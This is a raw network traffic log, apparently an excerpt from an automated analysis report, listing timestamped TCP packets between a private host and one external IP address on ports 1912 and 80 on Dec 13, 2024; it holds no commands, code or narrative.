                                                                                                                                                                                                Dec 13, 2024 08:19:15.271914005 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271923065 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271974087 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271991968 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272146940 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272156000 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272241116 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272250891 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272377014 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272387028 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272428036 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272460938 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272569895 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272579908 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272654057 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272663116 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272707939 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272763968 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272855043 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272900105 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272929907 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.272977114 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273082018 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273092985 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273161888 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273173094 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273216009 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273264885 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273369074 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273386955 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273436069 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273454905 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273513079 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273578882 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273639917 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273693085 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273747921 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273757935 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273833990 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.273853064 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.274044037 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.274115086 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.287345886 CET8049791185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.287509918 CET8049791185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.287664890 CET4979180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.288892031 CET4979180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388345957 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388468027 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388480902 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388492107 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388556957 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388566971 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388689041 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388700008 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388711929 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388827085 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388863087 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388884068 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388983965 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.388993979 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389163017 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389173985 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389183998 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389252901 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389324903 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389375925 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389518976 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389528990 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389708042 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389729023 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389853001 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389890909 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389950037 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.389971018 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390088081 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390098095 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390106916 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390110970 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390233040 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390244007 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390253067 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390260935 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390271902 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390317917 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390367031 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390415907 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390460968 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390512943 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390553951 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390572071 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390628099 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390678883 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390835047 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390844107 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.390945911 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.391021967 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.391072989 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.391082048 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.391180038 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.391236067 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.391465902 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.391576052 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.393868923 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.393938065 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394088030 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394170046 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394179106 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394212961 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394294024 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394381046 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394390106 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394433975 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394500017 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394535065 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394661903 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394682884 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394823074 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.394840956 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395065069 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395073891 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395082951 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395128012 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395268917 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395277977 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395364046 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395427942 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395437002 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395445108 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395514011 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395523071 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395570040 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395586967 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395674944 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395693064 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395817041 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395838022 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395904064 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395915031 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.395982981 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396080017 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396092892 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396106005 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396166086 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396203995 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396344900 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396353960 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396363020 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396393061 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396475077 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396617889 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396627903 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396636009 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396711111 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396821022 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396831036 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.396838903 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.397083998 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.402981997 CET4979380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.408592939 CET8049791185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511302948 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511364937 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511374950 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511449099 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511503935 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511512995 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511619091 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511729956 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511738062 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511778116 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511892080 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511933088 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511974096 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.511982918 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512135029 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512144089 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512173891 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512191057 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512347937 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512357950 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512453079 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512461901 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512526035 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512578964 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512672901 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512728930 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512835026 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512844086 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512852907 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512892008 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512902021 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.512984037 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513000965 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513010025 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513051987 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513070107 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513149977 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513159037 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513246059 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513254881 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513298035 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513392925 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513405085 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513531923 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513540030 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513612032 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513621092 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513632059 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513739109 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513748884 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513859034 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513869047 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513912916 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.513921976 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.516973972 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517030954 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517124891 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517174006 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517293930 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517365932 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517376900 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517471075 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517532110 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517544985 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517740011 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517750025 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517899990 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517910004 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.517965078 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518023968 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518098116 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518106937 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518244982 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518255949 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518358946 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518430948 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518484116 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518537998 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518676043 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518686056 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518770933 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518830061 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518955946 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.518965960 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519141912 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519151926 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519221067 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519267082 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519304037 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519429922 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519443035 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519490004 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519541979 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519552946 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519754887 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.519764900 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.523089886 CET8049793185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.523303986 CET4979380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.523392916 CET4979380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.643040895 CET8049793185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.644877911 CET4979380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.764712095 CET8049793185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.933443069 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.980688095 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:16.091898918 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:16.214590073 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:16.524678946 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:16.536535978 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:16.656416893 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:16.969343901 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:16.972311020 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:17.093766928 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:17.122733116 CET8049793185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:17.122752905 CET8049793185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:17.122843981 CET4979380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:17.124592066 CET4979380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:17.231187105 CET4979880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:17.244750023 CET8049793185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:17.350980043 CET8049798185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:17.351066113 CET4979880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:17.351145983 CET4979880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:17.406563044 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:17.407691956 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:17.470961094 CET8049798185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:17.471020937 CET4979880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:17.527375937 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:17.590790033 CET8049798185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:17.841469049 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:17.846333027 CET497601912192.168.2.11185.81.68.147
